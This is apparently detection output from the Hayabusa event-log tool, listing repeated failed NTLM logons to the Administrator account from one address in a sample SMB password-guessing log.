2016-09-20 01:52:32.123 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b7MEstBFjiWhVE18 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.176 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Y8Y2kDEiMZWf0znn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.213 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zBAFVgPIOyCvtdRs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.253 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: s3pFhUcspF6lzQXN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.297 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 39LFXXW715pQoADC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.341 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: in4ewyxouUnxQzCQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.374 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zOtV8CLIU6Mcw2ty | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.412 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b8NJqimhGrg9uhTh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.457 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XEWLTOY9magV0h6L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.497 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Di1MZsJx52Bi8E6k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.536 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 22MdB2QodynfibkF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Qojej3YITXvXJ6Pe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.618 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CLjbQ6timbdQoufd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.653 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aZgoAnGEFwXN88bQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.698 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NZFWoL9XUMJdfNnY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.747 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: x000TRnXfVtPAQSE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.801 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HNHWWHDOpXQyNdrR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.861 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1irbPdOoUfvq1MXd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.906 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dCflbKOMPJRXQHsD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.942 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Zuy6nD4EXeGzEy5e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.984 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xkig4u0LIS9v3HMK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.029 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 94RbUrUcMf6VhP8A | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.069 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: X9f7wCJ3wI9RmZTL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.117 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LkVs1viGo4RxhFaY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.212 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OKMLt6t01vUDDq1s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.254 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xYSif8ADOkC8aInB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.300 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EpmraSe2sxFVupTy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.352 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VPtfy3AxXpt9D3bx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.397 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tRMOrE0Ba983q0Jv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.437 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jQ0nkyTAeJt3dCpx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.489 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n2fdsRMU9SMm1KpL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.538 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3kliEPBsbsYNI7yG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9gEKFGsRvvlzulxR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.625 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5M6oUbT8LvS7JNCq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.661 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E4dxHwRQVR7iBWa1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.697 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VRygirU257VfFcR5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.742 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6H6i0wkjvWkU6cmp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.793 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: W4Nh7bYfVvx30hVF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.849 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GQEsO4GpVjO5xpRh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.885 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c9ZlpSBwq0tLAgzm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.933 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 65Piip53B1AiSBqb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.974 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Bh7SfuheoykW7Aym | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.019 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tWdm76C4nL6tkU0Z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.065 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u2WEqTrg3A760Axt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.116 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oyqhXspTlWwVCwA3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.160 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4rkidbQJmvQr35Jg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.193 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zr92VsL1YgHVehnL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.235 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rQP1K9rHrOyL0TOc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.281 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LR783q3o34oLQLTI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.320 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6NCTNhcghRGWf1qi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.354 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CVJdStLdKDbUICyB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.400 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: luAoVhEj1rOgZBfp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.453 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OrqmovxoEEjLCaYV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.491 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AIP4mDSVhM27IAIP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.537 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cym5lXDK01XuJz2b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.573 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7pYXA1Ic6BOfG31o | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.612 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b722QrTSVoZGfiK8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.657 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NzRFz4L7dpar794B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.697 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pLWuw9eMN9rqm0Ic | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.737 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sE7pzfiKRfOb2dH5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.786 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YxL1cV8OiFVRfj4I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.817 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qHs8Z8XPLg58jZ1u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.857 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i6kRLlJt3Oxwhdgq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.897 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: s4kTwriHAKVsTqzB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.941 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jfitpZ5ZrzBfpNf6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.984 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NdcU6ypEEeIAugGI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:35.029 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jIMfGIU1pHasO88g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:35.073 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MHsxKEQK7CWSqprp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:35.118 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QkC70klP6mv8YZrN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:35.160 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v3YM3zaZk64qqq7K | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:35.193 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mOLbk23zOqQLZYZU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:35.243 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v0tlyXqvCQJVqaB5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:35.291 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: npjQlHcGls5gENng | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:35.385 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7buinUqketmW3Ib6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
